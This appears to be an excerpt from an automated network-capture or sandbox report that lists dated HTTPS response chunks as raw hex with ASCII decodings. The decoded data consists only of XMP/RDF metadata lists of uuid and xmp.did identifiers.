64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 35 43 36 46 33 33 44 37 39 41
                                                                                                                                                                                    Data Ascii: 5D</rdf:li> <rdf:li>uuid:5B828EF0D376DD11A352BC019E81FB43</rdf:li> <rdf:li>uuid:5BA402EF80D4DE119699FBAEA63DA4BA</rdf:li> <rdf:li>uuid:5BB52CCCBBE1DE11BBE7DA9FB466DBA1</rdf:li> <rdf:li>uuid:5C13133184DFDE11BCF784AEB07C4144</rdf:li> <rdf:li>uuid:5C6F33D79A
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4087INData Raw: 37 34 37 33 44 44 43 31 31 42 31 41 32 45 44 35 44 33 31 36 44 38 42 43 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 38 45 42 42 31 45 46 46 46 32 32 38 45 30 31 31 41 34 41 36 43 41 39 44 30 36 42 33 30 46 35 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 38 46 31 33 34 39 39 41 32 31 33 31 45 30 31 31 39 37 36 38 44 45 32 46 35 32 31 31 32 46 36 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 38 46 35 44 45 35 46 30 37 41 46 42 44 45 31 31 41 33 32 37 41 31 32 31 45 44 44 36 41 34 32 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 38 46 46 31 46 41 30 39 44 38 32 36 31 31 44 41 38 30 37 43 46 38 36 35 37 44 37 34 42 35 38 46 3c 2f 72 64 66 3a 6c 69 3e 20
                                                                                                                                                                                    Data Ascii: 7473DDC11B1A2ED5D316D8BC7</rdf:li> <rdf:li>uuid:8EBB1EFFF228E011A4A6CA9D06B30F5E</rdf:li> <rdf:li>uuid:8F13499A2131E0119768DE2F52112F6B</rdf:li> <rdf:li>uuid:8F5DE5F07AFBDE11A327A121EDD6A42D</rdf:li> <rdf:li>uuid:8FF1FA09D82611DA807CF8657D74B58F</rdf:li>
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4110INData Raw: 30 30 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 41 36 38 41 44 42 38 45 34 41 42 31 44 46 31 31 41 41 33 39 44 44 35 38 30 37 37 30 45 38 34 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 41 36 39 42 34 42 43 42 32 39 42 43 44 44 31 31 39 30 44 36 44 35 39 31 41 37 39 43 36 44 44 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 41 37 37 37 46 33 46 39 42 34 45 34 45 30 31 31 39 42 38 32 38 35 36 44 43 37 39 31 44 38 36 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 41 37 41 43 33 34 39 43 30 36 38 45 44 46 31 31 42 34 38 32 42 30 46 43 45 42 35 34 30 37 34 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 41 37 46 41 42 31 42 44 41
                                                                                                                                                                                    Data Ascii: 002</rdf:li> <rdf:li>uuid:A68ADB8E4AB1DF11AA39DD580770E844</rdf:li> <rdf:li>uuid:A69B4BCB29BCDD1190D6D591A79C6DD7</rdf:li> <rdf:li>uuid:A777F3F9B4E4E0119B82856DC791D860</rdf:li> <rdf:li>uuid:A7AC349C068EDF11B482B0FCEB54074D</rdf:li> <rdf:li>uuid:A7FAB1BDA
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4182INData Raw: 64 3a 45 33 35 30 32 32 34 37 45 39 45 34 31 31 44 46 39 46 41 35 42 38 30 32 34 42 42 36 36 38 36 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 45 33 36 45 34 41 46 44 30 34 36 36 44 44 31 31 39 39 33 33 42 38 35 35 31 34 39 34 42 44 35 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 45 33 38 46 42 34 46 35 38 33 45 35 44 43 31 31 41 46 39 37 43 41 37 39 38 45 45 41 30 43 34 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 45 33 45 33 33 41 43 35 32 33 35 39 44 45 31 31 39 38 38 32 43 36 43 42 32 36 44 35 30 44 32 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 45 34 41 41 32 35 46 32 36 30 37 45 45 31 31 31 39 43 36 32 39 46 44 42 32 39 41 45 30 39 43 34 3c
                                                                                                                                                                                    Data Ascii: d:E3502247E9E411DF9FA5B8024BB6686D</rdf:li> <rdf:li>uuid:E36E4AFD0466DD119933B8551494BD56</rdf:li> <rdf:li>uuid:E38FB4F583E5DC11AF97CA798EEA0C47</rdf:li> <rdf:li>uuid:E3E33AC52359DE119882C6CB26D50D2E</rdf:li> <rdf:li>uuid:E4AA25F2607EE1119C629FDB29AE09C4<
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4198INData Raw: 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 31 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 34 35 37 42 35 42 31 35 38 46 33 39 30 33 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 31 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 34 35 37 44 42 39 38 41 44 45 36 30 33 36 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 31 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 35 46 45 38 30 31 34 45 39 32 39 45 34 38 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 31 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 35 46 45 38 34 33 37 36 39 32 41 30 45 32 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 31
                                                                                                                                                                                    Data Ascii: :li> <rdf:li>xmp.did:01801174072068119457B5B158F3903A</rdf:li> <rdf:li>xmp.did:01801174072068119457DB98ADE6036B</rdf:li> <rdf:li>xmp.did:018011740720681195FE8014E929E489</rdf:li> <rdf:li>xmp.did:018011740720681195FE8437692A0E2F</rdf:li> <rdf:li>xmp.did:01
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4262INData Raw: 32 36 43 30 31 34 44 41 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 32 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 39 34 43 38 34 42 34 38 37 39 38 43 36 44 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 32 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 39 34 43 43 34 39 46 32 41 37 45 34 30 33 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 32 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 39 34 43 43 45 36 37 33 46 44 41 32 41 33 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 32 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 39 34 43 45 46 39 45 43 46 36 46 45 45 43 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66
                                                                                                                                                                                    Data Ascii: 26C014DA4</rdf:li> <rdf:li>xmp.did:0280117407206811994C84B48798C6D2</rdf:li> <rdf:li>xmp.did:0280117407206811994CC49F2A7E403D</rdf:li> <rdf:li>xmp.did:0280117407206811994CCE673FDA2A3B</rdf:li> <rdf:li>xmp.did:0280117407206811994CEF9ECF6FEECD</rdf:li> <rdf
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4302INData Raw: 65 36 39 32 61 63 62 39 64 37 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 36 66 37 39 32 62 36 2d 36 36 30 39 2d 34 66 61 30 2d 62 31 62 39 2d 61 61 61 39 30 66 33 61 38 33 38 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 37 30 34 63 36 61 61 2d 31 34 31 37 2d 37 37 34 65 2d 39 65 62 65 2d 66 62 36 65 61 34 33 35 63 66 31 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 37 31 42 45 44 31 45 31 45 32 30 36 38 31 31 41 34 38 32 46 37 45 33 32 32 39 42 31 31 30 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 37 35 32 44 32 45 36 39 42 32 37 36 38 31 31 39 35 46 45 41 32 35 42 42 30 46 43 43 38 45 38 3c 2f 72 64
                                                                                                                                                                                    Data Ascii: e692acb9d7b</rdf:li> <rdf:li>xmp.did:06f792b6-6609-4fa0-b1b9-aaa90f3a838b</rdf:li> <rdf:li>xmp.did:0704c6aa-1417-774e-9ebe-fb6ea435cf19</rdf:li> <rdf:li>xmp.did:071BED1E1E206811A482F7E3229B110C</rdf:li> <rdf:li>xmp.did:0752D2E69B27681195FEA25BB0FCC8E8</rd
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4318INData Raw: 64 3a 30 65 38 37 61 30 32 66 2d 61 61 63 36 2d 66 36 34 62 2d 61 36 32 38 2d 39 30 64 65 65 32 66 36 30 37 33 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 65 65 61 37 35 38 34 2d 65 61 65 61 2d 66 31 34 63 2d 39 30 39 31 2d 61 30 38 39 62 39 30 31 33 31 31 65 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 66 30 31 30 65 61 66 2d 36 39 38 63 2d 34 34 64 39 2d 62 38 61 35 2d 64 63 39 31 66 34 64 62 61 66 36 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 66 33 38 63 65 30 33 2d 66 33 38 63 2d 61 35 34 33 2d 62 36 65 33 2d 35 66 36 30 65 66 37 62 61 64 33 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 66 33 61 39
                                                                                                                                                                                    Data Ascii: d:0e87a02f-aac6-f64b-a628-90dee2f60734</rdf:li> <rdf:li>xmp.did:0eea7584-eaea-f14c-9091-a089b901311e</rdf:li> <rdf:li>xmp.did:0f010eaf-698c-44d9-b8a5-dc91f4dbaf6f</rdf:li> <rdf:li>xmp.did:0f38ce03-f38c-a543-b6e3-5f60ef7bad38</rdf:li> <rdf:li>xmp.did:0f3a9
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4446INData Raw: 32 2d 34 35 39 30 2d 62 30 39 39 2d 31 61 64 66 33 63 65 63 30 34 39 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 37 31 31 35 46 33 43 36 31 41 30 45 30 31 31 39 46 36 46 43 46 35 42 36 32 42 41 30 42 42 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 37 31 32 42 34 34 35 30 37 44 35 45 30 31 31 41 35 38 39 44 35 39 37 41 46 39 44 31 34 33 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 37 31 35 33 38 36 39 31 31 30 43 31 31 45 34 41 38 37 44 39 41 45 35 43 37 43 37 43 43 34 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 37 33 37 31 38 32 38 31 33 43 36 45 30 31 31 42 41 46 44 43 45 44 41 30 41 44 46 37 39 35
                                                                                                                                                                                    Data Ascii: 2-4590-b099-1adf3cec0492</rdf:li> <rdf:li>xmp.did:17115F3C61A0E0119F6FCF5B62BA0BB0</rdf:li> <rdf:li>xmp.did:1712B44507D5E011A589D597AF9D143D</rdf:li> <rdf:li>xmp.did:17153869110C11E4A87D9AE5C7C7CC42</rdf:li> <rdf:li>xmp.did:1737182813C6E011BAFDCEDA0ADF795
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4548INData Raw: 41 32 43 32 36 34 33 46 46 44 42 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 35 61 30 61 61 36 64 2d 65 64 65 66 2d 32 34 34 30 2d 61 35 62 64 2d 31 38 38 33 38 36 30 64 31 30 38 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 35 62 32 30 65 39 64 2d 35 64 61 30 2d 62 38 34 65 2d 39 64 64 61 2d 31 64 35 66 30 37 61 34 65 37 33 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 35 63 63 32 30 35 63 2d 38 63 65 64 2d 34 66 32 64 2d 39 31 62 63 2d 31 37 36 32 37 32 66 64 38 32 34 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 35 63 64 35 65 64 33 2d 36 39 35 61 2d 34 37 34 65 2d 61 38 39 36 2d 33 63 62 37 63 62 36
                                                                                                                                                                                    Data Ascii: A2C2643FFDB0</rdf:li> <rdf:li>xmp.did:25a0aa6d-edef-2440-a5bd-1883860d1082</rdf:li> <rdf:li>xmp.did:25b20e9d-5da0-b84e-9dda-1d5f07a4e735</rdf:li> <rdf:li>xmp.did:25cc205c-8ced-4f2d-91bc-176272fd8245</rdf:li> <rdf:li>xmp.did:25cd5ed3-695a-474e-a896-3cb7cb6
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4572INData Raw: 32 33 36 38 31 31 38 32 32 41 44 30 37 43 37 43 43 34 33 38 44 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 33 43 35 33 39 35 35 30 41 32 30 36 38 31 31 38 30 38 33 42 46 44 39 41 39 46 38 31 37 33 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 33 43 43 30 31 38 31 33 32 32 36 36 38 31 31 38 43 31 34 46 31 45 38 34 42 43 43 43 39 45 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 33 44 46 36 31 46 41 44 34 32 31 36 38 31 31 42 36 43 38 39 31 43 38 45 30 42 37 37 43 39 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 33 46 36 41 34 42 36 44 38 34 43 45 31 31 31 39 36 42 38 43 42 34 42 46 35 30 45 31 36 43 38 3c
                                                                                                                                                                                    Data Ascii: 236811822AD07C7CC438D7</rdf:li> <rdf:li>xmp.did:33C539550A2068118083BFD9A9F81730</rdf:li> <rdf:li>xmp.did:33CC0181322668118C14F1E84BCCC9EA</rdf:li> <rdf:li>xmp.did:33DF61FAD4216811B6C891C8E0B77C98</rdf:li> <rdf:li>xmp.did:33F6A4B6D84CE11196B8CB4BF50E16C8<
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4754INData Raw: 78 6d 70 2e 64 69 64 3a 33 39 43 44 30 41 38 39 43 30 36 39 45 31 31 31 39 32 46 37 43 41 44 41 35 46 45 34 39 38 36 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 39 44 42 31 44 41 41 38 43 35 35 45 35 31 31 39 32 32 44 45 42 44 37 42 46 31 36 38 31 32 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 39 45 41 36 42 45 42 42 44 31 42 45 31 31 31 42 35 30 44 43 42 31 35 42 45 44 31 41 39 44 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 39 62 66 31 33 33 34 2d 33 63 35 36 2d 34 61 34 30 2d 62 34 36 38 2d 63 36 63 62 34 30 36 65 37 35 36 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 39 64 62 35 66 66 33 2d 62 62
                                                                                                                                                                                    Data Ascii: xmp.did:39CD0A89C069E11192F7CADA5FE49869</rdf:li> <rdf:li>xmp.did:39DB1DAA8C55E511922DEBD7BF168129</rdf:li> <rdf:li>xmp.did:39EA6BEBBD1BE111B50DCB15BED1A9D2</rdf:li> <rdf:li>xmp.did:39bf1334-3c56-4a40-b468-c6cb406e7565</rdf:li> <rdf:li>xmp.did:39db5ff3-bb
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4794INData Raw: 2e 64 69 64 3a 34 38 31 31 38 42 41 38 30 37 32 30 36 38 31 31 38 41 36 44 43 36 33 38 46 39 46 43 39 35 45 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 38 31 42 34 30 31 33 39 45 44 41 44 46 31 31 39 30 34 30 44 34 37 35 33 39 41 43 31 44 36 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 38 33 35 34 39 39 36 38 38 32 30 36 38 31 31 38 32 33 46 44 31 34 44 45 32 43 38 43 38 37 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 38 33 38 33 32 39 37 45 34 39 35 45 30 31 31 42 45 36 33 39 45 36 32 36 33 42 37 45 44 31 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 38 34 42 42 41 32 45 41 37 37 31 45 30 31 31 38 35
                                                                                                                                                                                    Data Ascii: .did:48118BA8072068118A6DC638F9FC95EE</rdf:li> <rdf:li>xmp.did:481B40139EDADF119040D47539AC1D68</rdf:li> <rdf:li>xmp.did:4835499688206811823FD14DE2C8C875</rdf:li> <rdf:li>xmp.did:48383297E495E011BE639E6263B7ED1C</rdf:li> <rdf:li>xmp.did:484BBA2EA771E01185
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4810INData Raw: 2e 64 69 64 3a 35 35 65 34 30 30 61 61 2d 35 33 31 62 2d 31 62 34 36 2d 38 64 32 63 2d 30 37 64 37 65 61 37 35 32 30 39 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 35 65 61 31 64 31 32 2d 63 62 62 61 2d 39 62 34 35 2d 61 64 35 31 2d 30 30 65 62 38 30 30 62 63 61 35 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 36 30 33 37 43 38 45 30 37 32 30 36 38 31 31 38 32 32 41 46 43 31 39 44 36 45 35 36 31 35 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 36 30 39 36 33 38 35 32 35 36 30 45 31 31 31 39 36 30 46 42 31 39 46 42 33 39 42 32 33 31 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 36 31 30 32 61 65 39 2d 63
                                                                                                                                                                                    Data Ascii: .did:55e400aa-531b-1b46-8d2c-07d7ea752094</rdf:li> <rdf:li>xmp.did:55ea1d12-cbba-9b45-ad51-00eb800bca5a</rdf:li> <rdf:li>xmp.did:56037C8E07206811822AFC19D6E5615D</rdf:li> <rdf:li>xmp.did:560963852560E111960FB19FB39B2310</rdf:li> <rdf:li>xmp.did:56102ae9-c
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4834INData Raw: 6d 70 2e 64 69 64 3a 35 61 30 66 37 38 66 61 2d 38 38 32 34 2d 64 35 34 32 2d 38 34 31 63 2d 33 39 62 30 62 39 66 66 35 32 64 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 61 32 61 36 64 64 64 2d 33 36 66 36 2d 39 39 34 32 2d 39 33 33 32 2d 32 65 37 61 37 65 62 34 34 34 66 65 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 61 33 35 31 33 34 31 2d 34 31 65 35 2d 34 39 62 64 2d 62 64 63 66 2d 32 31 33 38 35 32 35 66 62 37 35 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 61 34 32 66 39 31 30 2d 34 39 65 61 2d 34 33 39 36 2d 39 64 62 34 2d 61 64 38 65 31 39 31 64 61 31 34 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a
                                                                                                                                                                                    Data Ascii: mp.did:5a0f78fa-8824-d542-841c-39b0b9ff52d5</rdf:li> <rdf:li>xmp.did:5a2a6ddd-36f6-9942-9332-2e7a7eb444fe</rdf:li> <rdf:li>xmp.did:5a351341-41e5-49bd-bdcf-2138525fb757</rdf:li> <rdf:li>xmp.did:5a42f910-49ea-4396-9db4-ad8e191da147</rdf:li> <rdf:li>xmp.did:
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4866INData Raw: 43 36 45 44 30 35 38 43 38 45 30 31 31 42 42 32 39 45 43 36 33 42 42 33 45 43 39 31 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 43 35 38 32 45 37 38 30 37 32 30 36 38 31 31 38 32 32 41 44 35 45 39 31 30 33 42 38 38 30 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 43 36 42 38 32 30 45 33 34 32 33 36 38 31 31 38 32 32 41 44 30 37 43 37 43 43 34 33 38 44 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 43 36 44 45 34 35 34 35 42 32 30 36 38 31 31 38 32 32 41 46 44 41 35 36 35 38 46 31 31 35 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 43 37 38 34 42 45 33 35 38 32 37 36 38 31 31 39 39 45 37 43 41 38 34 43 38
                                                                                                                                                                                    Data Ascii: C6ED058C8E011BB29EC63BB3EC910</rdf:li> <rdf:li>xmp.did:6C582E7807206811822AD5E9103B880C</rdf:li> <rdf:li>xmp.did:6C6B820E34236811822AD07C7CC438D7</rdf:li> <rdf:li>xmp.did:6C6DE4545B206811822AFDA5658F115D</rdf:li> <rdf:li>xmp.did:6C784BE35827681199E7CA84C8
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4882INData Raw: 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 41 31 31 43 38 38 42 45 35 44 43 45 31 31 31 41 38 38 41 38 34 44 36 34 34 36 42 41 42 35 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 41 35 39 42 38 46 35 30 39 32 30 36 38 31 31 38 43 31 34 46 34 45 46 32 30 45 42 43 38 44 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 41 35 41 32 32 44 42 37 33 32 31 36 38 31 31 41 42 30 38 46 34 41 39 42 34 39 35 41 34 35 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 41 36 39 30 44 33 38 36 31 32 32 36 38 31 31 38 41 36 44 46 36 30 45 46 37 31 30 31 39 45 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 41 41 41 46 46
                                                                                                                                                                                    Data Ascii: <rdf:li>xmp.did:7A11C88BE5DCE111A88A84D6446BAB54</rdf:li> <rdf:li>xmp.did:7A59B8F5092068118C14F4EF20EBC8D3</rdf:li> <rdf:li>xmp.did:7A5A22DB73216811AB08F4A9B495A45C</rdf:li> <rdf:li>xmp.did:7A690D38612268118A6DF60EF71019E7</rdf:li> <rdf:li>xmp.did:7AAAFF
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4890INData Raw: 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 31 61 33 39 62 37 64 2d 33 35 62 65 2d 34 31 38 66 2d 38 66 65 34 2d 32 62 65 33 65 35 63 39 62 39 30 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 31 62 39 63 37 65 36 2d 33 62 34 38 2d 62 63 34 35 2d 62 62 36 38 2d 31 66 65 63 66 35 31 36 34 66 63 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 31 62 64 66 31 62 35 2d 36 61 66 37 2d 37 38 34 66 2d 38 39 31 61 2d 30 66 36 36 39 37 38 61 66 63 63 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 31 64 31 65 33 31 64 2d 36 62 63 33 2d 64 33 34 34 2d 61 38 35 34 2d 32 34 38 34 64 34 38 31 63 30 65 36 3c 2f 72 64 66 3a 6c
                                                                                                                                                                                    Data Ascii: </rdf:li> <rdf:li>xmp.did:81a39b7d-35be-418f-8fe4-2be3e5c9b908</rdf:li> <rdf:li>xmp.did:81b9c7e6-3b48-bc45-bb68-1fecf5164fc2</rdf:li> <rdf:li>xmp.did:81bdf1b5-6af7-784f-891a-0f66978afcc2</rdf:li> <rdf:li>xmp.did:81d1e31d-6bc3-d344-a854-2484d481c0e6</rdf:l
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4906INData Raw: 35 66 39 35 66 37 38 38 30 36 32 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 62 36 31 36 39 34 35 2d 39 30 35 38 2d 39 38 34 30 2d 39 64 34 36 2d 32 61 30 63 61 31 66 32 36 64 63 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 62 36 38 61 62 33 35 2d 35 32 39 63 2d 62 32 34 31 2d 61 30 61 34 2d 66 30 39 30 31 35 33 36 37 30 63 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 62 38 65 64 33 32 34 2d 32 63 39 31 2d 34 35 30 63 2d 62 39 32 36 2d 34 35 34 63 39 31 65 64 32 38 62 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 62 39 32 65 63 32 30 2d 61 33 65 66 2d 34 35 33 34 2d 39 36 34 61 2d 31 35 38 30 35 64 31
                                                                                                                                                                                    Data Ascii: 5f95f788062c</rdf:li> <rdf:li>xmp.did:8b616945-9058-9840-9d46-2a0ca1f26dc1</rdf:li> <rdf:li>xmp.did:8b68ab35-529c-b241-a0a4-f090153670c9</rdf:li> <rdf:li>xmp.did:8b8ed324-2c91-450c-b926-454c91ed28ba</rdf:li> <rdf:li>xmp.did:8b92ec20-a3ef-4534-964a-15805d1
